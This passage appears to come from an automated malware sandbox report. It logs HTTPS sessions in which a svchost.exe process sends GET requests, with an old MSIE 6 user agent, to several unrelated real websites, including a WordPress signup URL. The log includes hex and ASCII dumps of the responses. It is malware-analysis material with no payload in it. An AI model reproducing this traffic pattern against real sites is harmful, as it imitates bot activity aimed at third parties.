                                                                                                                                                                              2023-09-15 05:27:29 UTC2884INData Raw: 34 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 63 61 73 65 2f 77 6f 72 6b 73 2f 6d 61 69 6e 74 65 6e 61 6e 63 65 2e 68 74 6d 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 6f 70 2d 70 65 72 66 6f 72 6d 61 6e 63 65 2d 69 6e 6e 65 72 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2e 2f 69 6d 61 67 65 73 2f 74 6f 70 2f 70 65 72 66 6f 72 6d 61 6e 63 65 2d 69 6d 61 67 65 36 2e 70 6e 67 22 20 61 6c 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 6f 70 2d 70 65 72 66 6f 72 6d 61 6e 63 65 2d 63 6f 6e 74 65 6e 74 22 3e e9 9b 86 e5 90 88 e4 bd 8f e5 ae 85 3c 62 72 3e e6 b6 88 e9 98 b2 e8 a8 ad e5 82 99 e7 82 b9
                                                                                                                                                                              Data Ascii: 4"> <a href="case/works/maintenance.html"> <div class="top-performance-inner"><img src="./images/top/performance-image6.png" alt=""> <p class="top-performance-content"><br>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                              12192.168.2.3502775.189.171.125443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                              2023-09-15 05:27:25 UTC352OUTGET / HTTP/1.1
                                                                                                                                                                              Accept: *
                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Host: www.muhr-soehne.de
                                                                                                                                                                              2023-09-15 05:27:25 UTC400INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Fri, 15 Sep 2023 05:27:25 GMT
                                                                                                                                                                              Server: Apache/2.4.38 (Debian)
                                                                                                                                                                              Last-Modified: Wed, 06 Sep 2023 11:27:25 GMT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              Content-Length: 52614
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                              2023-09-15 05:27:26 UTC401INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 64 65 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 21 2d 2d 20 0a 09 6d 61 64 65 20 62 79 20 50 53 56 6e 65 6f 0a 0a 09 54 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 70 6f 77 65 72 65 64 20 62 79 20 54 59 50 4f 33 20 2d 20 69 6e 73 70 69 72 69 6e 67 20 70 65 6f 70 6c 65 20 74 6f 20 73 68 61 72 65 21 0a 09 54 59 50 4f 33 20 69 73 20 61 20 66 72 65 65 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 20 46 72 61 6d 65 77 6f 72 6b 20 69 6e 69 74 69 61 6c 6c 79 20 63 72 65 61 74 65 64 20 62 79 20 4b 61 73 70 65 72 20 53 6b 61 61 72 68 6f 6a 20
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html dir="ltr" lang="de"><head><meta charset="utf-8">... made by PSVneoThis website is powered by TYPO3 - inspiring people to share!TYPO3 is a free open source Content Management Framework initially created by Kasper Skaarhoj
                                                                                                                                                                              2023-09-15 05:27:26 UTC417INData Raw: 69 74 65 6d 20 6c 61 79 6f 75 74 2d 30 20 20 22 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 76 65 72 73 63 68 6c 69 65 73 73 74 65 63 68 6e 69 6b 2f 76 65 72 73 63 68 6c 69 65 73 73 6d 61 73 63 68 69 6e 65 6e 22 20 74 69 74 6c 65 3d 22 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: item layout-0 "> <a href="/verschliesstechnik/verschliessmaschinen" title="Verschliemaschinen"> Verschliemaschinen </a>
                                                                                                                                                                              2023-09-15 05:27:26 UTC561INData Raw: 6d 69 6e 2f 75 73 65 72 5f 75 70 6c 6f 61 64 2f 4e 61 63 68 68 61 6c 74 69 67 6b 65 69 74 2f 63 73 6d 5f 6d 65 74 61 6c 5f 72 65 63 79 63 6c 65 73 5f 66 6f 72 65 76 65 72 2e 6a 70 67 22 3e 3c 73 6f 75 72 63 65 20 6d 65 64 69 61 3d 22 28 6d 61 78 2d 77 69 64 74 68 3a 20 31 33 39 39 70 78 29 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 39 39 32 70 78 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 66 69 6c 65 61 64 6d 69 6e 2f 75 73 65 72 5f 75 70 6c 6f 61 64 2f 4e 61 63 68 68 61 6c 74 69 67 6b 65 69 74 2f 63 73 6d 5f 6d 65 74 61 6c 5f 72 65 63 79 63 6c 65 73 5f 66 6f 72 65 76 65 72 2e 6a 70 67 22 3e 3c 73 6f 75 72 63 65 20 6d 65 64 69 61 3d 22 28 6d 69 6e 2d 77 69 64 74 68 3a 20 31 34 30 30 70 78 29 22 0a 20 20 20 20
                                                                                                                                                                              Data Ascii: min/user_upload/Nachhaltigkeit/csm_metal_recycles_forever.jpg"><source media="(max-width: 1399px) and (min-width:992px)" srcset="/fileadmin/user_upload/Nachhaltigkeit/csm_metal_recycles_forever.jpg"><source media="(min-width: 1400px)"
                                                                                                                                                                              2023-09-15 05:27:26 UTC577INData Raw: 39 39 32 70 78 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 66 69 6c 65 61 64 6d 69 6e 2f 5f 70 72 6f 63 65 73 73 65 64 5f 2f 65 2f 63 2f 63 73 6d 5f 65 66 72 65 2d 65 75 5f 34 38 30 5f 30 32 62 64 33 65 31 34 64 39 2e 6a 70 67 22 3e 3c 73 6f 75 72 63 65 20 6d 65 64 69 61 3d 22 28 6d 69 6e 2d 77 69 64 74 68 3a 20 31 34 30 30 70 78 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 66 69 6c 65 61 64 6d 69 6e 2f 5f 70 72 6f 63 65 73 73 65 64 5f 2f 65 2f 63 2f 63 73 6d 5f 65 66 72 65 2d 65 75 5f 34 38 30 5f 30 32 62 64 33 65 31 34 64 39 2e 6a 70 67 22 3e 3c 69 6d 67 20 63 6c 61 73 73 3d 22 69 6d 61 67 65 2d 65 6d 62 65 64 2d 69 74 65 6d 20 20 69 6d 67 20 69 6d 67 2d 66 6c 75 69 64 22 20
                                                                                                                                                                              Data Ascii: 992px)" srcset="/fileadmin/_processed_/e/c/csm_efre-eu_480_02bd3e14d9.jpg"><source media="(min-width: 1400px)" srcset="/fileadmin/_processed_/e/c/csm_efre-eu_480_02bd3e14d9.jpg"><img class="image-embed-item img img-fluid"


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                              13192.168.2.36279775.2.95.235443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                              2023-09-15 05:27:40 UTC2894OUTGET / HTTP/1.1
                                                                                                                                                                              Accept: *
                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Host: ldh.la.gov
                                                                                                                                                                              2023-09-15 05:27:40 UTC2895INHTTP/1.1 406 Not Acceptable
                                                                                                                                                                              Date: Fri, 15 Sep 2023 05:27:40 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 1346
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Server: Microsoft-IIS/10.0
                                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                                              2023-09-15 05:27:40 UTC2895INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 36 20 2d 20 43 6c 69
                                                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>406 - Cli


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                              14192.168.2.363074104.21.52.126443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                              2023-09-15 05:27:40 UTC2896OUTGET / HTTP/1.1
                                                                                                                                                                              Accept: *
                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Host: hyab.se
                                                                                                                                                                              2023-09-15 05:27:40 UTC2896INHTTP/1.1 403 Forbidden
                                                                                                                                                                              Date: Fri, 15 Sep 2023 05:27:40 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Content-Length: 5723
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                              Cross-Origin-Resource-Policy: same-origin
                                                                                                                                                                              Origin-Agent-Cluster: ?1
                                                                                                                                                                              Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                              Referrer-Policy: same-origin
                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                              cf-mitigated: challenge
                                                                                                                                                                              Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                              Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oWtG%2Bpqcn8dJydijs0UB%2Fitc8JDZyljbnp%2F2kyx4m6BL9%2BL9QjxJrjZiqRsmxE2zLUZ3sOiTL61le7muwSiUMfbUh8tAJML9yfEcGpxB8ioQwXRna%2B9RqndC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 806e763d9f1c41e7-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              2023-09-15 05:27:40 UTC2897INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Com
                                                                                                                                                                              2023-09-15 05:27:40 UTC2898INData Raw: 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 33 35 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20
                                                                                                                                                                              Data Ascii: patible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewport" content="width=device-width,initial-scale=1"><link href="/cdn-cgi/styles/challenges.css" rel="stylesheet"><meta http-equiv="refresh" content="35"></head><body
                                                                                                                                                                              2023-09-15 05:27:40 UTC2899INData Raw: 4c 76 66 63 71 7a 49 43 47 34 39 41 6d 6f 6e 32 68 4f 4d 72 37 78 4c 72 46 70 77 54 5f 6f 6e 43 71 68 76 48 46 49 66 74 51 6b 63 56 32 46 4d 42 32 59 51 41 7a 43 55 7a 72 6e 65 5a 62 75 7a 53 52 42 75 76 44 49 67 39 42 51 55 4e 76 6c 34 51 50 46 58 4d 5a 4c 31 55 54 37 4b 6e 36 55 4f 52 37 6d 5a 79 57 43 72 79 5a 53 6b 68 4a 5a 73 6f 63 7a 71 45 6d 62 59 35 4b 74 50 65 67 4b 69 6c 51 5f 57 75 37 54 30 46 4b 78 7a 6d 47 55 52 6f 68 32 30 52 67 58 52 43 56 41 4a 42 35 4d 51 79 41 54 41 59 42 49 37 6b 47 34 72 50 37 5a 4d 63 56 66 57 47 39 2d 5a 67 35 37 62 43 31 70 73 68 33 69 7a 36 63 30 50 79 75 39 77 59 54 4b 6b 43 42 77 65 4a 72 4d 73 42 45 72 41 2d 6a 44 66 45 72 38 4b 54 71 4a 73 30 54 36 39 78 57 48 32 62 74 62 59 57 4f 30 57 45 62 6b 7a 73 72 39 79
                                                                                                                                                                              Data Ascii: LvfcqzICG49Amon2hOMr7xLrFpwT_onCqhvHFIftQkcV2FMB2YQAzCUzrneZbuzSRBuvDIg9BQUNvl4QPFXMZL1UT7Kn6UOR7mZyWCryZSkhJZsoczqEmbY5KtPegKilQ_Wu7T0FKxzmGURoh20RgXRCVAJB5MQyATAYBI7kG4rP7ZMcVfWG9-Zg57bC1psh3iz6c0Pyu9wYTKkCBweJrMsBErA-jDfEr8KTqJs0T69xWH2btbYWO0WEbkzsr9y
                                                                                                                                                                              2023-09-15 05:27:40 UTC2900INData Raw: 59 59 78 45 70 67 56 59 5f 6c 53 62 33 64 58 6e 6d 74 5f 37 50 72 34 71 65 6d 35 67 31 6b 69 43 39 33 34 76 76 62 53 4c 4a 65 31 71 77 43 6f 77 79 59 63 33 43 67 4c 5a 37 42 6e 78 55 55 59 79 36 72 47 49 67 48 34 37 62 5a 4e 35 41 4a 63 5a 34 72 30 52 41 2d 54 4c 75 51 4e 72 79 45 6c 48 6a 55 54 73 68 7a 4f 61 4c 42 6d 59 36 6a 37 45 49 70 5f 7a 37 65 70 58 45 48 32 48 78 6a 4d 44 30 66 5a 6d 62 39 62 6e 77 44 71 49 78 54 54 35 76 6f 30 7a 47 67 6d 6a 34 6c 44 67 75 52 75 6b 50 32 34 53 30 79 4f 73 41 48 35 72 45 4d 44 4d 31 50 32 4c 4b 30 52 6a 4d 34 31 73 59 49 71 49 41 6b 5f 59 48 73 41 75 35 74 53 45 31 6d 54 42 78 4e 69 66 6c 4f 45 7a 56 2d 41 65 4c 57 4d 36 6c 37 44 44 4f 57 61 31 4f 73 58 58 45 5f 75 56 2d 30 42 66 77 79 57 56 45 34 6e 63 4d 4a 73
                                                                                                                                                                              Data Ascii: YYxEpgVY_lSb3dXnmt_7Pr4qem5g1kiC934vvbSLJe1qwCowyYc3CgLZ7BnxUUYy6rGIgH47bZN5AJcZ4r0RA-TLuQNryElHjUTshzOaLBmY6j7EIp_z7epXEH2HxjMD0fZmb9bnwDqIxTT5vo0zGgmj4lDguRukP24S0yOsAH5rEMDM1P2LK0RjM41sYIqIAk_YHsAu5tSE1mTBxNiflOEzV-AeLWM6l7DDOWa1OsXXE_uV-0BfwyWVE4ncMJs
                                                                                                                                                                              2023-09-15 05:27:40 UTC2902INData Raw: 36 4f 37 70 34 57 4f 79 34 65 68 36 4e 4c 34 4a 47 74 4b 55 58 6f 39 53 62 67 41 55 39 6e 6a 56 33 79 43 44 75 70 30 62 50 32 4f 44 77 33 4f 42 43 6a 63 38 76 30 64 62 71 63 54 41 63 47 64 32 6c 4b 38 44 46 6e 35 76 72 4f 71 63 39 78 76 39 47 65 4e 4c 48 30 74 4f 70 77 54 37 58 5a 6b 48 58 72 67 47 51 7a 44 30 5a 38 4b 61 67 44 32 4f 4d 57 59 32 2f 72 49 31 45 61 6d 69 39 32 65 61 77 59 68 63 66 47 4f 6f 68 48 59 49 41 38 43 34 65 53 77 37 33 41 67 48 44 73 51 58 4d 37 63 2f 49 59 62 66 4c 2b 77 4c 6f 6a 34 54 66 75 45 30 59 59 49 50 78 36 53 37 74 44 6e 78 5a 2b 57 6e 58 30 47 47 46 36 62 6d 67 31 4f 32 5a 6e 4c 51 4d 43 39 55 34 78 68 62 59 79 78 38 5a 70 63 52 61 38 6e 36 59 70 50 6b 43 4c 6f 55 47 5a 6f 6b 58 77 44 6e 61 51 41 3d 27 2c 74 3a 20 27 4d
                                                                                                                                                                              Data Ascii: 6O7p4WOy4eh6NL4JGtKUXo9SbgAU9njV3yCDup0bP2ODw3OBCjc8v0dbqcTAcGd2lK8DFn5vrOqc9xv9GeNLH0tOpwT7XZkHXrgGQzD0Z8KagD2OMWY2/rI1Eami92eawYhcfGOohHYIA8C4eSw73AgHDsQXM7c/IYbfL+wLoj4TfuE0YYIPx6S7tDnxZ+WnX0GGF6bmg1O2ZnLQMC9U4xhbYyx8ZpcRa8n6YpPkCLoUGZokXwDnaQA=',t: 'M
                                                                                                                                                                              2023-09-15 05:27:40 UTC2903INData Raw: 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 63 70 6f 29 3b 7d 28 29 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                              Data Ascii: ument.getElementsByTagName('head')[0].appendChild(cpo);}());</script></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                              15192.168.2.36377894.130.146.206443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                              2023-09-15 05:27:41 UTC2903OUTGET / HTTP/1.1
                                                                                                                                                                              Accept: *
                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Host: diamir.de
                                                                                                                                                                              2023-09-15 05:27:41 UTC2903INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Fri, 15 Sep 2023 05:27:41 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 162
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Location: https://www.diamir.de/
                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                              2023-09-15 05:27:41 UTC2904INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                              16192.168.2.36383583.223.113.46443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                              2023-09-15 05:27:41 UTC2903OUTGET /wp-signup.php?new=magicomm.co.uk HTTP/1.1
                                                                                                                                                                              Accept: *
                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Host: dataform.co.uk
                                                                                                                                                                              2023-09-15 05:27:42 UTC2958INHTTP/1.1 200 OK
                                                                                                                                                                              Cache-Control: must-revalidate, no-cache, max-age=0
                                                                                                                                                                              Keep-Alive: timeout=2, max=97
                                                                                                                                                                              Content-Length: 49178
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Access-Control-Allow-Headers: mobileappversionnumber, x-requested-with
                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                              X-Powered-By: PHP/7.0.29
                                                                                                                                                                              X-UA-Compatible: IE=EmulateIE10
                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                              X-Mod-Pagespeed: 1.9.32.14-0
                                                                                                                                                                              Strict-Transport-Security: max-age=10886400
                                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                                              Date: Fri, 15 Sep 2023 05:27:41 GMT
                                                                                                                                                                              Connection: close
                                                                                                                                                                              2023-09-15 05:27:42 UTC2959INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 36 29 20 7c 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 09 20 20 20 20 3c
                                                                                                                                                                              Data Ascii: <!DOCTYPE html>...[if !(IE 6) | !(IE 7) | !(IE 8) ]>...><html lang="en-US" class="no-js">...<![endif]--><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0"> <
                                                                                                                                                                              2023-09-15 05:27:42 UTC2961INData Raw: 4c 28 29 7d 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 76 61 72 20 74 3d 61 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 74 2e 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 2c 61 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 68 65 61 64 22 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 66 6f 72 28 6f 3d 41 72 72 61 79 28 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 29 2c 74 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 30 7d 2c 72 3d 30 3b 72 3c 6f 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 74 2e 73 75 70 70 6f 72 74 73 5b 6f 5b 72 5d 5d 3d
                                                                                                                                                                              Data Ascii: L()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=
